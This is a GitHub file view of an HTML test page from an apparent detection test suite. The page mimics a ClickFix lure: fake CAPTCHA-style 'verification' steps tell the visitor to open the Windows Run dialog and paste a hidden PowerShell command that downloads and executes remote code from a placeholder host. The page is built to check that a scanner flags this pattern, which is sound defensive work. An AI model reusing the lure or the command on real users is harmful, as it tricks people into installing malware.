-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathclickfix-basic.html
More file actions
32 lines (32 loc) · 1.45 KB
/
clickfix-basic.html
File metadata and controls
32 lines (32 loc) · 1.45 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Basic ClickFix</title>
<style>
body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; margin: 0; padding: 20px; background: #f5f5f7; color: #1d1d1f; }
.test-header { background: #fff4e6; border: 1px solid #ffa200; padding: 10px 14px; border-radius: 6px; margin-bottom: 20px; font-size: 13px; }
.test-header strong { color: #b75500; }
.test-container { background: white; padding: 24px; border-radius: 8px; box-shadow: 0 2px 8px rgba(0,0,0,0.06); }
a.back { display: inline-block; margin-bottom: 16px; color: #0066cc; text-decoration: none; font-size: 13px; }
a.back:hover { text-decoration: underline; }
</style>
</head>
<body>
<a href="index.html" class="back">← Back to test suite</a>
<div class="test-header">
<strong>🧪 Nehboro Test Page:</strong> Basic ClickFix · Should trigger: <code>CLICKFIX_FULL_SEQUENCE</code>
</div>
<div class="test-container">
<h2>Complete these Verification Steps</h2>
<p>To better prove you are not a robot, please:</p>
<ol>
<li>Press & hold <b>Windows Key ⊞ + R</b> to open the Run dialog</li>
<li>In the verification window, press <b>Ctrl + V</b> to paste the command</li>
<li>Press <b>Enter</b> on your keyboard to finish</li>
</ol>
<p>You will observe and agree: <code>powershell -w hidden -c "iwr example.com/fix | iex"</code></p>
<p>Perform the steps above to finish verification.</p>
</div>
</body>
</html>